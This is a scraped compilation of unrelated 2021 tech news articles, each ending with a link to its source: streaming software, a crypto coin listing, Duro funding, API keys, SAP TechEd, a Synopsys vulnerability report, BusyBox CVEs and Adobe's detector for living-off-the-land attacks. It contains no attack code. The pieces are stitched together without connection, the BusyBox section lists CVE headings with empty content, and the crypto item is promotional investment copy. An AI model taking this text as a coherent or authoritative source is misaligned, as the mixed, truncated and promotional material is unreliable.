I quit my job at the start of 2020. Two months later, the U.S. went into lockdown and everyone glued themselves to their screens. So, like many avid gamers, I started streaming on Twitch. After deciding what to stream and when, and acquiring a webcam, I had to pick my broadcasting software. When youre starting out as a streamer, your budget, or lack thereof, is going to be a major factor. And to this day, I havent felt the need to move to a paid broadcasting platform because so much can be accomplished with free options.

After a casual Google search, I initially settled on XSplit. The setup process was fairly straightforward, which took a lot of the guesswork and scouring the net for guides out of the equation. XSplit is probably best known for allowing users to stream content to multiple platforms, like Twitch, Facebook Gaming, and YouTube. It also boasts the ability to tweak video settings for resolution up to 4k and frames per second well above the standard 60fps.

That said, XSplit requires you to either create an account or sign in with an existing social media account. And unless you pay for an XSplit subscription, youll only be able to stream to a single platform, and quality levels will be capped at 720p and 30fps.

Its also important to note that the features differ on each platform. For example, Twitch does not support 4k resolution in streams while YouTube, on the other hand, does. Also, while XSplit allows for higher framerate settings, Twitch, Facebook Gaming, and YouTube all recommend streaming at no higher than 60fps.

When I first started, I got set up on Twitch, then decided to maximize my potential audience by creating a Facebook page and streaming to both sites simultaneously, though not with XSplit, as streaming to multiple sources is a premium feature. Then I qualified for the Twitch Affiliate program.

Without getting too off-topic, Im going to remind everyone of the importance of reading contracts. One of the stipulations that many streamers miss in the Twitch Affiliate contract is that Twitch owns the exclusive rights to every one of their streams for 24 hours, which means that everything, including clips, cannot be uploaded or streamed on another platform. I promptly stopped dual-streaming to Facebook.

I had a lot of success using XSplit. Its a solid piece of software and has received numerous updates since I first tried it. But, in my search for the best combination of options and features from free software, I decided to move on to a different program: Open Broadcaster Software.

Aptly named, OBS is open source, which means that power users can code their own plugins and casual users can download and use them. This also means that bugs are usually caught and fixed quickly, and its usually the first program to get new updates.

The setup process for OBS is both simpler and more complicated than the setup for XSplit while the initial download and run installer work in its favor, OBS requires much more tweaking to ensure the best stream quality for your audience. The manual setup can take some serious time and research.

On top of that, OBS lacks a chat overlay and customizable themes out of the box. These stream theme overlays must be separately downloaded and manually installed, which isnt terribly difficult but takes more effort than other options.

But it isnt all bad. OBS has plenty of advantages, too. Unlike XSplits free version, OBS allows for livestreaming at 1080p and 60fps, taking full advantage of the recommended limits. Its also less resource-intensive, saving your CPU for more important things like your game. OBS also supports multi-platform streaming.

OBS was good to me, but I never felt like it clicked. The options available for making my stream look and feel the way I wanted just werent available. Instead, my strongest recommendation for a free broadcasting software goes to Streamlabs platform.

Streamlabs is a company built for livestreamers. Because OBS is open source, users have been able to build out their own versions on top of it, enabling streamers to choose from all kinds of premade tools, like chat monitoring bots and overlays. But thats not all Streamlabs does. It also has tools for building your community and editing your clips.

Streamlabs setup process is the easiest by far, taking advantage of Open Broadcaster Softwares plug-and-play approach. The key difference, however, lies in the built-in optimizer. Rather than having to manually select the best settings for your stream machine, the optimizer takes care of everything for you.

Where Streamlabs really shines, though, is in its customization options. Both OBS and Streamlabs have adjustable user interfaces. Simply click and drag the various informational boxes around the window to suit your needs. But Streamlabs makes personalizing the layout and design that your audience sees and interacts with much more convenient.

Streamlabs also has a bunch of free overlays available on its site. Instead of hunting for a stream overlay that matches your style and vibe, then downloading and going through the trouble of integrating it into OBS, you can simply install it directly with the click of a button. Remember to keep your hardware limits in mind, though, as every additional tool running on top of Streamlabs will take more power from your CPU.

How you set up the streaming experience and manage the backend can greatly impact your audiences first impressions, as well as make watching the stream more enjoyable. Animated backgrounds, chat management bots, and sound alerts create a more engaging experience. And it will take time to curate the perfect blend of immersive and meta features that make your stream unique.

Youll also want to be comfortable working with the settings and tweaking your streams visuals and sound effects. While Streamlabs is the clear winner of the big three free options, some companies that offer sponsorship deals will be partnered with another companys platform, like StreamElements OBS.

(While I was writing this article, controversy rose surrounding Streamlabs new premium service. Despite feeling conflicted about recommending Streamlabs, I still believe that their free broadcasting software is the best choice for streamers. Id encourage you to look further into the situation and weigh the options for yourself.)

Whether you are starting to stream as a hobby or hoping to turn it into your next career move, livestreaming requires some serious legwork. The best thing you can do is be informed of the pros and cons of each option, and choose the best fit for your streaming needs.

Here is the original post:

XSplit, OBS, or Streamlabs: Whats the best free streaming software - Polygon

INTERNET CITY, DUBAI, Nov. 18, 2021 LBank Exchange, a global digital asset trading platform, will list Chives coin (XCC) on November 19, 2021. For all users of LBank Exchange, the XCC/USDT trading pair will be officially available for trading at 20:00 (UTC+8) on November 19, 2021.

Since the birth of cryptocurrencies such as bitcoin and Ethereum, the discussions of environmental pollution and energy wasting caused in their mining process have never stopped. As a completely decentralized, no reservation, no ICO, and community autonomy green cryptocurrency, Chives coin (XCC) can create a low-power, green and environmentally friendly blockchain system. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021, to further expand its global reach and help it achieve its vision.

Chives is an eco-friendly blockchain based on proof of space and time (PoST) without pre-mine and ICO. Its not affiliated with Chia Network Inc., but is built on Chias outstanding open source code. As a hard fork created by community volunteers, in order to prevent large mining pools from dominating, Chives uses a combination of PoST and proof of service (PoSE).

Farmers of Chives can use free hard disk space to mine 90% of Chives openly, fairly and transparently. The income of Chives farmers is proportional to the amount of allocated space. If a farmer has 10 times more space, the farmer will get 10 times more rewards. Chives is proof that modern blockchains can be eco-friendly, safe, and effective at the same time.

The Chives project pays special attention to the development of an eco-friendly blockchain, as well as related technological products. The Chives network supports a token issuance mechanism similar to ERC-20 and supports an NFT issuance mechanism similar to ERC-721. At the moment, the project has already developed its own Chives Swap exchange, a web wallet, and a marketplace for selling pets for the future NFT game.

The game will directly promote the application and popularization of core products such as stable coins (USDT), tokens (ERC-20), NFT (ERC-721), automated exchanges (AMM), and mobile wallets on the Chives blockchain. This greatly contributes to the growth and popularization of the Chives network and will bring various ecological designs on the Chives blockchain to a new level.

The entire Chives is based on the Chia branch, adding an asset mortgage, community autonomy, budget review and other functions. 90% of chives are allocated to miners and the remaining 10% is allocated to participants who contribute to the Chives community ecosystem. Chives upholds the spirit of openness and open source, and encourages people from all walks of life to work together to promote the development of Chives.

The goal of the Chives project is to create an independent community and a global decentralized payment network using its own cryptocurrency, called Chives or XCC, as the main payment method. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021, investors who are interested in Chives coin investment can easily buy and sell XCC on LBank Exchange by then. The listing of XCC on LBank Exchange will undoubtedly help it further expand its business and draw more attention in the market.

Learn More about XCC Token:

Official Website: https://www.chivescoin.orgTwitter: https://twitter.com/chives_projectTelegram: https://t.me/chives_network

Listing Announcement on LBank Exchange: https://support.lbank.site/hc/en-gb/articles/4409594129177Chives-coin-XCC-will-be-listed-on-LBank

LBank Exchange, founded in 2015, is an innovative global trading platform for various crypto assets. LBank Exchange provides its users with safe crypto trading, specialized financial derivatives, and professional asset management services. It has become one of the most popular and trusted crypto trading platforms with over 6.4 million users in more than 210 countries around the world.

Visit us on social media:

l Facebookl Twitterl LinkedIn

Contact Details:

LBK Blockchain Co. LimitedLBank Exchangemarketing@lbank.info

Original post:

LBank Exchange Will List Chives coin (XCC) on November 19, 2021 - bitcoinist.com

To software developers, the process of creating a hardware product can seem distinctly 1980s. Even in the most high-tech of work flows, there are tons of error-prone and potentially expensive manual, steps including spreadsheets, confusion and a general feeling of the will to live sagging away through the musty, solder-stained floorboards of the hardware development shop. Along comes Duro and the $4 million the company just raised, in an attempt to bring some agile methodology sanity to a final-bill-of-materials.top-assembly.final.final.final.final.no-really-final-this-time.xls world.

Duros fundraising round was led by B2B SaaS investors Bonfire Ventures, with follow-on money from hard-tech investors Riot Ventures.The new funding will be used to expand sales and marketing teams and to further develop Duros product lifecycle management (PLM) solutions.

I am a former electrical engineer. For 20 years I designed and manufactured products IoT, Drones, telecom equipment, wearables, cleantech, you name it. I got frustrated with how much of my time was being spent managing the most fundamental elements of hardware development: CAD files, your bill of materials and your supply chain data, explains Duros CEO Michael Corr. Theres a product category called Product Lifecycle Management or PLM which is meant to be a receptacle for that information for centralizing and managing it. It includes revision control, and you use it with your own teams, as well as sharing it with your contract manufacturers. And yet none of the tools I used were actually saving time or actually providing value at the end of the day. Its all done so manually and is so process-driven that it was often easier to just use spreadsheets. Thats still the prevalent technology today, because the established tools are just so damn complicated and prone to error, and theyre not actually providing value.

With an axe to grind against the status quo, co-founders Michael Corr and Kellan OConnor developed Duro as a cloud platform to centralize all product data and remove the friction of connecting disparate teams and tools. The goal is transparency and giving everyone from the product teams, the engineering teams and the suppliers and manufacturing teams access to the most accurate and most recent data at all times.

To simplify things a little, the hardware industry is dominated by a bimodal culture. You have the older generation that came into the workforce in the 80s and 90s, who established these toolsets that we have today. Meanwhile, there is a gap young engineers were more interested in learning web, mobile and app development, as it was so much more in vogue. There wasnt a continuation of young engineers entering the hardware space, Corr outlines the market landscape where Duro is staking out its territory. But now theyre coming back. Hardware has proven itself to be a sexy product. IoT happened, and the cost of developing hardware came down drastically. Now what we are seeing is a wave of a younger generation of engineers thats entering the workforce. They are the ones that Duro is going after. They are used to the culture from software development, and they have different standards for the software they use.

In other words, where SaaS, GitHub and dev/ops processes completely changed how software is delivered on an ongoing basis, Duro wants to take similar mechanics and invite the hardware folks to join the current millennium.

GitHub did an excellent job of proving that it can be done. You can have a single cloud-hosted source of your source code control, and then you build an ecosystem of tools and people and tasks around it. And everyones always pointing to GitHub. In the hardware industry, traditionally, that hasnt been the case. You have multiple teams, doing their disparate responsibilities: electrical engineering, mechanical engineering, procurement, manufacturing, etc. Because there hasnt been a concept of centralizing it, everybody has their own copy of the data, explains Corr. Everybody has their own separate copy of the bill materials, for example, and that creates a problem. It creates this additional necessity of overhead to manage all those communication channels and making sure that everybody has the latest copy.

Were incredibly excited to partner with Duro, which is bringing a fresh solution to a big market dominated by old companies. When a startup like Duro lowers the barrier to entry for a whole new set of users, it positions them to get the lions share of that new addressable market, said Jim Andelman, co-founder and managing director at Bonfire Ventures. Customer affinity for Duros platform is off the charts: its clear to us that this is the PLM solution of choice for engineering-driven businesses.

In addition to the product itself, the company is innovating on its business model, taking a leaf out of the SaaS playbook.

Theres a lot of friction in software sales for hardware in the past. Very expensive applications, driven by user-license business models. And there are rarely trials available if you want to use it, you just have to pay for and just accept what you get. So Duro innovates a little bit there too. We have three subscription packages. The starter package allows companies who know that spreadsheets are not a good solution and want to get into properly managed data, centralized and controlled environments. The Pro version works right out of the box, without the complex configuration and setup needed by other products. Its designed for teams who are at the cusp of doing its first round of production, and want to do proper revision control interface with their suppliers, explains Corr. Our enterprise package is more the expansive package for teams that have outgrown those lower two tiers, or that are just more established and they have existing workflows.

The starter package is $450 a month or $5,400 a year. The Pro package weighs in at $750 per month or around $9,000 per year. The enterprise package is a little bit more open ended, depending on the needs of the customer. The Duro team told me that they have contracts ranging from $25,000 to $100,000, depending on how the software is configured.

Given our extensive experience investing in full-stack businesses, we know that issues surrounding data continuity are synonymous with hardware manufacturing and weigh heavily on the industry, said Will Coffield, co-founder and general partner at Riot Ventures. We love Duros approach to modernizing hardware design/development, using automation to replace manual processes and connect teams to information for intelligent and efficient collaboration.

Read the original:

Duro drags hardware product development into the age of agile - TechCrunch

Hackers rarely actually break-in, instead they simply log in, is a worn clich among computer security protagonists. Hackers can and do exploit defects in software code where errors by the original authors are then manipulated to enable unintended access.

If you are a Windows, Mac, Android or iPhone user, no doubt you receive regular notices that your device should now be updated to the latest version of its host software, so as to repair newly discovered security vulnerabilities.

But if a hacker can discover or deduce the password credentials for an account, it is obviously much simpler to just log in using these and so gain access.

Passwords have been critical to protect online access to our email, online shopping carts, newspaper subscriptions, bank accounts and much more. We are strongly advised that we should never use the same password for different services, never make them too short, and never make them easy to guess. We should always change them regularly, should always use random collections of numbers and letters and punctuation marks, and should keep them private.

In short, they are incredibly inconvenient but apparently an awkward necessity for our digital lives.

Help with remembering passwords is offered by digital vaults and password managers that can administer your password portfolio on your behalf. They can synchronise passwords across the different devices you may own, and usually offer to scan the dark web looking for any compromised accounts.

However the industry, led by Google, Microsoft, Apple and others, is now rapidly moving to a password-less world in which passwords can be completely avoided. The most obvious alternatives are based on bio-metrics, such as scanning your face or a fingerprint.

But you may baulk at major multinationals easily accumulating a huge collection of personal identity information across much of the planet, potentially invaluable to governments and police agencies alike.

Whatever the pros and cons of various authentication approaches for us to log in to our computers, you may not realise that software systems also make extensive use of passwords. These are in the form of digital api keys to gain access to databases and other software services across the web.

These authentication credentials are not at all intended to be remembered by humans, and so usually take the form of lengthy collections of letters and numbers, randomly generated as needed.

Unlike a login password which identifies a particular user, they instead identify a particular software application, component or subsystem that may in fact be used by very many human users.

For example, if a particular app on your smart device uses a Google map such as a taxi-hailing app, or a courier or food delivery app the app must present its api key to Googles mapping service each time the app is run and regardless of which particular user happens to be running the app. The api key is set when the app was built, and is used by Google to verify legitimate use of its mapping service by an authorised app.

Digital keys are routinely used within application software to access payment services, databases, and other web services.

While Google does not charge app developers for integrating its mapping service into their apps, some software services offered over the web to developers do charge for their use. The api key is then critical to authenticating and charging the relevant app owner, who may then recover the cost by charging app fees to end users.

Thankfully when you use an app, you do not need to know these various internal api keys in addition to your own personal passwords. Nevertheless, the keys must appear somewhere deep within the system, and are a potential security vulnerability. If a hacker discovers such a digital secret, they can potentially script software to explore a service and any data which it may have accumulated, or run up costs for fraudulent use.

Software developers frequently work in teams, and may also re-use software published in open source by the community in software repositories. It is not unusual to find api keys and authentication credentials unintentionally published within software source code.

Fortunately for software developers, there are a number of tools which can scan the source code, searching for keys and credentials associated with particular web-based services, and generate an appropriate warning if discovered.

But in the same way that users are being encouraged to go password-less and rely instead on other authentication mechanisms, innovation may ultimately displace the need for api keys, so removing authentication vulnerabilities and also avoiding the need for scanning and detection tools.

A more sophisticated approach might use a two-stage or even a multistage handshake, and perhaps only be run in full when an app is installed or updated.

Digital authentication is an intriguing innovation space because of the counter-measures, and counter-counter-measures continuously being conceived by the good and bad guys alike.

Link:

Chris Horn: Digital authentication is an intriguing innovation space - The Irish Times

SAP is expanding its tools and services for developers of all skill levels, with several announcements from this week's SAP TechEd 2021 virtual conference.

SAP TechEd is an annual gathering of the SAP developer community that provides information on new tools and services, along with learning content and sessions that enable SAP developers to expand their skills.

For experienced developers, SAP is now providing individual access to the free tier model of SAP Business Technology Platform (BTP), SAP's integrated development environment. Previously, SAP BTP was available to only licensed SAP customers and partners.

SAP is also now offering its veteran Advanced Business Application Programming (ABAP) developers a cloud-ready development environment for the programming language inside SAP S/4HANA Cloud. Formally named SAP S/4HANA Cloud ABAP Environment, the new platform is derived from the SAP BTP ABAP cloud environment known as Steampunk and is referred to as "Embedded Steampunk."

For business users with limited development skills or citizen developers, SAP made SAP AppGyver generally available. SAP AppGyver is a low-code/no-code development platform that SAP acquired in February. The platform will be available in SAP BTP.

In order to enhance the skills of developers at all levels, SAP launched a new SAP Learning site, which contains learning content including expert-led sessions, hands-on training and microlearning videos.

The intent behind the SAP TechEd announcements is to provide developers with tools and services to build applications that can address some of the challenges businesses face, including the pandemic, global climate change and inequality, said Juergen Mueller, CTO at SAP, said during his executive keynote at the SAP TechEd.

Opening the free tier for SAP BTP is something that SAP developers have been asking for, he said.

"SAP BTP is now available to individual developers, so you can now discover and experience SAP BTP services without any financial commitment," Mueller said. "This has been a journey that many [SAP developers] have been following very closely and have contributed actively to this milestone."

One of the problems companies are facing is a shortage of skilled developers, which makes the availability of low-code/no-code platforms like AppGyver and the opportunity to build skills through SAP Learning site more important than ever, according to Mueller.

"A huge technology talent gap is opening up that needs to be filled, so SAP is giving open access to learning resources and providing low-code and no-code solutions as a way out of this dilemma," he said.

The products and services announced at TechEd should provide value for various developer levels, said Tammy Powlas, a business analyst and SAP Mentor, an SAP technology advocate selected by members of the SAP community, who works at a utilities company. She pointed specifically to individual access to the free tier for SAP BTP and general availability of AppGyver.

"I know as a [Project Management Professional] that the Project Management Institute says there's a shortage of developers and the citizen developer is the answer, so it's good to see SAP focus on AppGyver as the low-code and no-code solution."

The Learning site, SAP's relaunched learning center, is a key for developer success, she said.

"What links these all together is the free SAP Learning site that includes free training for low-code/no-code and SAP BTP solutions," Powlas said.

The new tools and services fill some gaps that needed to be filled for SAP developers, said Holger Mueller, vice president and principal analyst at Constellation Research.

AppGyver, for example, is an overdue item in SAP's low-code toolset, which should see more uptake now that it's embedded in SAP BTP, Mueller said.

"The free tier access forSAP BTP is a good move but SAP needs to convince on its merit, but they are not there yet," he said. "The S/4HANA Cloud ABAP Environment, Embedded Steampunk, is very good and overdue, this is the one key announcement for the existing customer and ecosystem."

SAP needs to get in the game against the developer tool sets from public cloud hyperscalers Amazon, Google Cloud Platform and Azure, which are becoming go-to developer environments for professional development and low-code/and no-code development, said Joshua Greenbaum, principal at Enterprise Applications Consulting. He said he believes the announcements from TechEd are a step in that direction and should help developers stay within the SAP platforms to build applications.

"SAP wants these extensions, net-new developments, citizen apps, RPA -- everything possible -- to run on SAP BTP because that makes their platform sticky and helps them fend off the hyperscalers who are making big inroads into their own developer communities," Greenbaum said.

Indeed, SAP appears to have gotten the free tier for SAP BTP right, agreed Jon Reed, co-founder of Diginomica, an enterprise computing industry analysis firm.

"It was a long time coming, and developers and [SAP developer] community leaders have been pressing SAP for this kind of developer agreement for years," he said. "We need to see how it plays out, but it appears that SAP now has a free tier on par with the hyperscalers and open source development environments."

SAP's commitment to low-code and no-code is clear and useful for both experienced and citizen developers, Reed said, but the availability of SAP AppGyver is a little underwhelming given the availability of low-code tools.

"Making AppGyver available to more citizen developers is welcome, but there are multiple tools for different uses, including third-party tools," he said. "SAP needs to provide more roadmap guidance and use case clarity on its various low-code environments going forward, like AppGyver, Ruum and Business Application Studio."

But Greenbaum countered that having a wealth of low-code and no-code options that all perform different functions -- AppGyver is particularly suited to building iOS and Android mobile interfaces -- is not a bad thing.

"It's both the blessing and the curse of any large enterprise software company, not just SAP, to have a confusing number of options," he said. "Everyone gets a little baffled, but any good bar has a good selection of beers, so it's about what people want."

The main goal for SAP in offering the development platforms and services is to prove that it's still an innovating enterprise company, Greenbaum said.

"SAP really has to build back its developer community," he said. "It has to build back this sense that they are the leading-edge innovators and break away from what it's tending to look like, which at times is just the legacy place to go to keep the lights on. If they don't capture innovation at the edge, they're doomed to legacy ERP status."

Jim O'Donnell is a TechTarget news writer who covers ERP and other enterprise applications for SearchSAP and SearchERP.

Here is the original post:

SAP TechEd sets sights on hyperscalers with developer tools - TechTarget

2021 Software Vulnerability Snapshot report examines prevalence of vulnerabilities identified by Synopsys Application Security Testing Services.

MOUNTAIN VIEW, Calif., Nov. 16, 2021 /PRNewswire/ -- Synopsys, Inc. (Nasdaq: SNPS) today published "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," a report examining data from 3,900 tests conducted on 2,600 targets (i.e., software or systems) during 2020. The data, compiled by tests performed by Synopsys security consultants in our assessment centers for our customers, included penetration testing, dynamic application security testing, and mobile application security analyses, designed to probe running applications as a real-world attacker would.

Eighty-three percent of the tested targets were web applications or systems, 12% were mobile applications, and the remainder were either source code or network systems/applications. Industries represented in the tests included software and internet, financial services, business services, manufacturing, media and entertainment, and healthcare.

"Cloud-based deployments, modern technology frameworks, and the rapid pace of delivery is forcing security groups to react more quickly as software is released," said Girish Janardhanudu, vice president, security consulting at Synopsys Software Integrity Group. "With insufficient AppSec resources in the market, organizations are leveraging application testing services such as those Synopsys provides in order to flexibly scale their security testing. We've seen a heavy increase in assessment demand throughout the pandemic."

In the 3,900 tests conducted, 97% of the targets were found to have some form of vulnerability. Thirty percent of the targets had high-risk vulnerabilities, and 6% had critical-risk vulnerabilities. The results demonstrate that the best approach to security testing is to utilize the wide spectrum of tools available to help ensure an application or system is free from vulnerabilities. For example, 28% of the total test targets had some exposure to a cross-site scripting (XSS) attack, one of the most prevalent and destructive high- /critical-risk vulnerabilities impacting web applications. Many XSS vulnerabilities occur only when the application is running.

Story continues

Other report highlights

2021 OWASP Top 10 vulnerabilities were discovered in 76% of the targets. Application and server misconfigurations were 21% of the overall vulnerabilities found in the tests, represented by the OWASP A05:2021Security Misconfiguration category. And 19% of the total vulnerabilities found were related to the OWASP A01:2021Broken Access Control category.

Insecure data storage and communication vulnerabilities plague mobile applications. Eighty percent of the discovered vulnerabilities in the mobile tests were related to insecure data storage. These vulnerabilities could allow an attacker to gain access to a mobile device either physically (i.e., accessing a stolen device) or through malware. Fifty-three percent of the mobile tests uncovered vulnerabilities associated with insecure communications.

Even lower-risk vulnerabilities can be exploited to facilitate attacks. Sixty-four percent of the vulnerabilities discovered in the tests are considered minimal-, low-, or medium-risk. That is, the issues found are not directly exploitable by attackers to gain access to systems or sensitive data. Nonetheless, surfacing these vulnerabilities is not an empty exercise, as even lower-risk vulnerabilities can be exploited to facilitate attacks. For example, verbose server bannersfound in 49% of the testsprovide information such as server name, type, and version number, which could allow attackers to perform targeted attacks on specific technology stacks.

An urgent need for a software Bill of Materials. Of note was the number of vulnerable third-party libraries in use, found in 18% of the penetration tests conducted by Synopsys Application Testing Services. This corresponds with the 2021 OWASP Top 10 category A06:2021Use of Vulnerable and Outdated Components. Most organizations typically use a mix of custom-built code, commercial off-the-shelf code, and open source components to create the software they sell or use internally. Often those organizations have informalor noinventories detailing exactly what components their software is using, as well as those components' licenses, versions, and patch status. With many companies having hundreds of applications or software systems in use, each themselves likely having hundreds to thousands of different third-party and open source components, an accurate, up-to-date software Bill of Materials is urgently needed to effectively track those components.

To learn more, download the "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," or read the blog post.

About the Synopsys Software Integrity Group

Synopsys Software Integrity Group helps development teams build secure, high-quality software, minimizing risks while maximizing speed and productivity. Synopsys, a recognized leader in application security, provides static analysis, software composition analysis, and dynamic analysis solutions that enable teams to quickly find and fix vulnerabilities and defects in proprietary code, open source components, and application behavior. With a combination of industry-leading tools, services, and expertise, only Synopsys helps organizations optimize security and quality in DevSecOps and throughout the software development life cycle. Learn more at http://www.synopsys.com/software.

About Synopsys

Synopsys, Inc. (Nasdaq: SNPS) is the Silicon to Software partner for innovative companies developing the electronic products and software applications we rely on every day. As an S&P 500 company, Synopsys has a long history of being a global leader in electronic design automation (EDA) and semiconductor IP and offers the industry's broadest portfolio of application security testing tools and services. Whether you're a system-on-chip (SoC) designer creating advanced semiconductors, or a software developer writing more secure, high-quality code, Synopsys has the solutions needed to deliver innovative products. Learn more at http://www.synopsys.com.

Editorial Contact: Liz SametSynopsys, Inc. 703-657-4218esamet@synopsys.com

Cision

View original content:https://www.prnewswire.com/news-releases/synopsys-research-finds-vulnerabilities-in-97-of-applications-36-impacted-by-critical--or-high-risk-vulnerabilities-301425386.html

SOURCE Synopsys, Inc.

Continued here:

Synopsys Research Finds Vulnerabilities in 97% of Applications, 36% Impacted by Critical- or High-Risk Vulnerabilities - Yahoo Finance

Team82 and JFrog have announced the discovery, by using static and dynamic techniques, of 14 vulnerabilities affecting the latest version of BusyBox.

Typically found in embedded devices with limited memory and storage resources, BusyBox is marketed as the Swiss Army Knife of embedded Linux. It's a software suite of useful Unix utilities, known as applets, packaged as a single executable file.

Busybox can be found on many OT and IoT devices, including popular programmable logic controllers (PLCs), human-machine interfaces (HMIs), and remote terminal units (RTUs) - many of which now run on Linux.

As part of a commitment to improving open-source software security, Claroty's Team82 and JFrog collaborated on a vulnerability research project examining BusyBox.

To research BusyBox, they used static and dynamic analysis approaches. First, a manual review of the BusyBox source code was conducted in a top-down approach (following user input up to specific applet handling). They also looked for obvious logical or memory corruption vulnerabilities.

The next approach was fuzzing. They compiled BusyBox with ASan and implemented an AFL harness for each BusyBox applet. Each harness was subsequently optimised by removing unnecessary parts of the code, running multiple fuzzing cycles on the same process (persistent mode), and running multiple fuzzed instances in parallel.

Details of the vulnerabilities

According to the collaboration, since the affected applets are not daemons, each vulnerability can only be exploited if the vulnerable applet is fed with untrusted data - usually through a command-line argument.

Specifically, these are the conditions that must occur for each vulnerability to be triggered:

CVE-2021-42373

CVE-2021-42374:

CVE-2021-42375:

CVE-2021-42376:

CVE-2021-42377:

CVE-2021-42378, CVE-2021-42386:

"We started from fuzzing all the daemon applets, including HTTP, Telnet, DNS, DHCP, NTP etc. Many code changes were required in order to effectively fuzz network-based input," the companies explain.

"For example, the main modification we performed was to replace all recv functions with input from STDIN to support fuzzed inputs. Similar changes were done when we fuzzed non-server applets as well."

Claroty's Team82 and JFrog prepared a couple of examples for each applet and ran hundreds of fuzzed BusyBox instances for a few days.

"This gave us tens of thousands of crashes to evaluate. We had to create classes of crashes with the same root cause to help reduce the volume of crashes we had in our sample set. Later, we minimised each group representative to work with a small subset of unique crash inputs," they say.

To fulfil these tasks, the team developed automatic tooling that digested all crash data and classified it based on the crash analysis report, which mainly includes the crash stack trace, registers, and assembly code of the relevant code area. For example, they merged cases with similar crash stack traces because they usually had the same problematic root cause.

Finally, the team researched each unique crash and minimised its input vector in order to understand the root cause, which allowed them to create a proof-of-concept that exploits the vulnerability responsible for the crash. In addition, they tested their PoCs against several BusyBox versions to understand when the bugs were introduced to the source code.

Threat Analysis and mitigation advice

To assess the threat level posed by these vulnerabilities, Team82 and JFrog inspected JFrog's database of more than 10,000 embedded firmware images. The team found that 40% of them contained a BusyBox executable file that is linked with one of the affected applets, making these issues extremely widespread among Linux-based embedded firmware.

According to Claroty, all 14 vulnerabilities have been fixed in BusyBox 1.34.0 and users are urged to upgrade immediately.

See more here:

Claroty and JFrog discover 14 vulnerabilities in Busybox - SecurityBrief New Zealand

Attackers who use standard system commands during a compromise a technique known as living off the land (LotL) to avoid detection by defenders and endpoint security software may find their activities in the spotlight if a machine learning project open sourced by software firm Adobe this week bears fruit.

The project, dubbed LotL Classifier, uses supervised learning and an open source dataset of real-world attack to extract features of specific commands and then classifies the command based on a features extracted using human analysis as a model. Those features are then used to determine whether the command is good or bad and to label the command with a set of tags that can be used for anomaly detection.

Each feature by itself such as accessing the /etc/shadow directory, where passwords hashes are typically stored, or access to Pastebin may seem suspicious, but usually are not malicious, says Andrei Cotaie, technical lead for security intelligence and engineering at Adobe.

"On their own, most of the tags or tag types have a high FP [false positive] rate, but combining them and feeding this combination through the machine learning algorithm can generate a higher rate of accuracy in the classifier," he says, adding that Adobe has benefited from the machine learning model. "The LotL Classifier is operational in our environment and based on our experience, by suppressing reoccurring alerts, the LotL Classifier generates a few alerts per day."

Living off the land has become a widely used attacker tactic when targeting enterprises. Malware attacks are just as likely to begin with a PowerShell command or Windows Scripting Host command two common administrative tools that can escape notice than as a more traditional malware executable. In 2019, CrowdStrike's incident response group found that "malware-free" attacks, another name for LotL, surpassed malware-based incidents. By the summer of 2021, they accounted for more than two-thirds of investigated incidents.

"Attackers are increasingly attempting to accomplish their objectives without writing malware to the endpoint, using legitimate credentials and built-in tools (living off the land) which are deliberate efforts to evade detection by traditional antivirus products," CrowdStrike stated in its "2021 Threat Hunting Report."

The LotL Classifier uses a supervised machine learning approach to extract features from a dataset of command lines and then creates decision trees that match those features to the human-determined conclusions. The dataset combines "bad" samples from open source data, such as industry threat intel reports, and the "good" samples come from Hubble, an open source security compliance framework, as well as Adobe's own endpoint detection and response tools.

The feature extraction process generates tags focused on binaries, keywords, command patterns, directory paths, network information, and the similarity of the command to known patterns of attack. Examples of suspicious tags might include a system-command execution path, a Python command, or instructions that attempt to spawn a terminal shell.

"The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed," Adobe stated in its blog post. "Then they quickly browse through the parameters and, if present in the command, they look at domain names, IP addresses, and port numbers."

Using those tags, the LotL Classifier uses a random-forest tree model that combines several decision trees to determine whether the code is malicious or legitimate.

"Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions are a valid system administrator and which as are an attacker," the company stated in a blog post.

The machine learning model can benefit companies in a variety of threat-analysis pipelines, says Adobe's Cotaie. Threat hunters could use it as a local service or the model could process global security information and event management (SIEM) data to find anomalies by feeding another open source tool released by Adobe, the One-Stop Anomaly Shop (OSAS). The model has a component for Windows systems and a separate one for Linux, but it's otherwise context independent.

"The classifier is integrated into ... One Stop Anomaly Shop (OSAS)," he says. "The parent project can model local or group system behavior using many context-dependent features and its anomaly detection features are complementary to the LotL classifier model."

Read the original post:

Open Source Project Aims to Detect Living-Off-the-Land Attacks - Dark Reading

Mastodon has sent former President Donald Trumps company a formal notification that its breaking the rules by using Mastodons open-source code to build its social network, named Truth. This news comes from a blog post by Mastodons founder Eugen Rochko, but others have previously pointed out that the organization behind Truth, the Trump Media and Technology Group (or TMTG), was violating Mastodons software license by not providing the source code for the site built on top of it. Trumps group has 30 days from when the letter was sent to comply with the license or stop using the software, or it could lose the right to do so.

While Truth hasnt officially launched yet, internet users discovered that a test version basically had the same interface as Mastodon, and that some of the code for the site was unchanged from the other social networks code. By itself, thats actually the intended use of open-source software but as the Software Freedom Conservancy pointed out last week, apps or websites based on software that uses the AGPLv3 license have to in turn provide their own source code. According to the foundation that wrote AGPL, its meant to make the communitys software better: if you improve on something that someone else made, they should be able to benefit from your work like you did theirs.

As Mastodon and Rochko reiterated on Friday, though, TMTG hasnt done that it even went as far as to call its software proprietary, and seemingly tried to hide the fact that it was based on Mastodon. Now that the Truth has been revealed, however, TMTG will either have to rebuild it without using Mastodons code a tall order, as bootstrapping a social network site isnt particularly easy or release its source code and change the terms of service.

Its not the first time Mastodon has had to deal with, as Rochko puts it, people so antithetical to [its] values trying to build on top of its open-source platform. In 2019 Gab, a social network known for getting banned from almost everything due to how many toxic users it had, decided it would use Mastodon as a backend. Unlike that situation though, where Gab wasnt really breaking any rules (at least regarding its use of the software), Truth is violating the AGPL by using Mastodon's code in an unauthorized way. How TMTG will deal with the gauntlet now that its been thrown down (twice) is anyones guess, but itll have to respond unless it wants to open itself up to possible legal action.

Trump Media and Technology Group didnt immediately respond to a request for comment.

Read more:

Mastodon puts Trumps social network on notice for improperly using its code - The Verge

